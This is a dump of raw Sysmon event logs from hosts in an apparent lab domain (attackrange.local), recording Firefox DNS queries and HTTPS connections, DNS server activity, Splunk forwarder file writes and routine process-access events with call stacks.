Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\permissions.sqlite-journalMD5=AB1F42049538C9961CDDDE1804BE9893,SHA256=55C4521E185C5F7E22460E0D17DB95D0F69E7327500C680DCF29CE00728F069F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051566Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:22.527{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local65116- 354300x80000000000000001051565Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:22.152{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-429.attackrange.local64464-false172.67.214.69-443https 354300x80000000000000001051564Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:22.105{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-429.attackrange.local53461-false172.67.214.69-443https 22542200x80000000000000001051563Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:22.211{5EBD8912-7B3A-6151-3A78-00000000FC01}7120www.jaiminton.com02606:4700:3031::6815:3adf;2606:4700:3031::ac43:d118;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x80000000000000001051562Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:22.205{5EBD8912-7B3A-6151-3A78-00000000FC01}7120www.jaiminton.com0172.67.209.24;104.21.58.223;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x80000000000000001051561Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:22.203{5EBD8912-7B3A-6151-3A78-00000000FC01}7120www.jaiminton.com0::ffff:104.21.58.223;::ffff:172.67.209.24;C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001051560Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:23.499{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C432288EB567C19037E3B9F7AF07635,SHA256=BF7BB2B3E225495A23E767E65D2E7434DA7153F88254DD97FFE26FBF5A4C409D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051559Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:22.098{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54211- 354300x80000000000000001051558Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:22.026{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-429.attackrange.local58295-false104.21.58.223-443https 354300x80000000000000001051557Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:21.916{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-429.attackrange.local53460-false142.250.185.74fra16s48-in-f10.1e100.net443https 354300x80000000000000001051556Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:21.914{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local58294- 354300x80000000000000001051555Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:21.912{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local52281- 354300x80000000000000001051554Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:21.896{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-429.attackrange.local53459-false104.21.58.223-443https 354300x80000000000000001051553Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:21.896{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local55080- 354300x80000000000000001051552Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:21.895{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local49632- 354300x80000000000000001051551Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:21.886{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local52902- 10341000x80000000000000001051550Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:23.178{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b5c4e8|C:\Program Files\Mozilla Firefox\xul.dll+19a2e8e|C:\Program Files\Mozilla Firefox\xul.dll+166f362|C:\Program Files\Mozilla Firefox\xul.dll+19ccb3c|C:\Program Files\Mozilla Firefox\xul.dll+9ebb5f|C:\Program Files\Mozilla Firefox\xul.dll+26b8e|C:\Program Files\Mozilla Firefox\xul.dll+19d5d8|C:\Program Files\Mozilla Firefox\xul.dll+19c48f|C:\Program Files\Mozilla Firefox\xul.dll+42102ba|C:\Program Files\Mozilla Firefox\xul.dll+427c355|C:\Program Files\Mozilla Firefox\xul.dll+427d173|C:\Program Files\Mozilla Firefox\xul.dll+1ef1143|C:\Program Files\Mozilla Firefox\firefox.exe+5c4d|C:\Program Files\Mozilla Firefox\firefox.exe+1bb98|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051549Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:23.167{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b59a47|C:\Program Files\Mozilla Firefox\xul.dll+b7d55f|C:\Program Files\Mozilla Firefox\xul.dll+bef0a5|C:\Program Files\Mozilla Firefox\xul.dll+3a4121|C:\Program Files\Mozilla Firefox\xul.dll+3a3ca4|C:\Program Files\Mozilla Firefox\xul.dll+3a3b48|C:\Program Files\Mozilla Firefox\xul.dll+c04bf0|C:\Program Files\Mozilla Firefox\xul.dll+c0456d|C:\Program Files\Mozilla Firefox\xul.dll+bfd604|C:\Program Files\Mozilla Firefox\xul.dll+c02a70|C:\Program Files\Mozilla Firefox\xul.dll+c031cb|C:\Program Files\Mozilla Firefox\xul.dll+396c71|C:\Program Files\Mozilla Firefox\xul.dll+c03f99|C:\Program Files\Mozilla Firefox\xul.dll+c06f52|C:\Program Files\Mozilla Firefox\xul.dll+c039b6|C:\Program Files\Mozilla Firefox\xul.dll+39647b|C:\Program Files\Mozilla Firefox\xul.dll+be47e3|C:\Program Files\Mozilla Firefox\xul.dll+be39b5 23542300x80000000000000001051548Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:23.140{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FF6AA2982AADE706F649BB0E6E6D16C7,SHA256=32D8FCFD6C2C8085AFE97BCEF8383FAC110868ABBEE90D423D670FBDA25E1DBF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051547Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:23.139{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FAC46DCC96919D9ADDD2285457803122,SHA256=E732ADEC3F3686F01265D1A7720E6A7FE68F1052DE7756E8095AD4F064DBAC44,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051546Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:23.130{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051545Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:23.129{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051544Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:23.097{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051543Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:23.097{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051542Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:23.031{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000979929Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:24.915{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09A084A5ED551F7898B10A002F1E1F78,SHA256=02C83156035CFD620C56E70C9258687AFE3F86B9DCD1864C61812349198D593C,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000001051570Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:22.418{5EBD8912-7B3A-6151-3A78-00000000FC01}7120use.fontawesome.com.cdn.cloudflare.net02606:4700:3031::ac43:d645;2606:4700:3037::6815:4e07;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x80000000000000001051569Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:22.414{5EBD8912-7B3A-6151-3A78-00000000FC01}7120use.fontawesome.com.cdn.cloudflare.net0104.21.78.7;172.67.214.69;C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001051568Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:24.516{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93196A9A9E8050A063F1212AE851D808,SHA256=9E92CF6806150F0A98717B58625DDB0384E27F45E8336D23696C6DCE13E2FB73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979944Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:25.930{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8053CACBD8AD801C139CEE854B5CA988,SHA256=774EE178EFBC28BE3F4918DF696FD79BFF47ABFC900130632C34EE04477AEB75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051575Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:25.528{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A5D3012F0EED5AFC26F5040249D047C,SHA256=D1025857CE95548027F6D2317EBE24F60A6D69D9495E014D59816C3F32E8BB5C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979943Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:25.899{69CF5F33-8C25-6151-EA79-00000000FD01}40123888C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979942Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:25.712{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8C25-6151-EA79-00000000FD01}4012C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979941Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:25.712{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979940Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:25.712{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979939Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:25.712{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979938Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:25.712{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979937Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:25.712{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979936Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:25.712{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979935Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:25.712{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979934Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:25.712{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 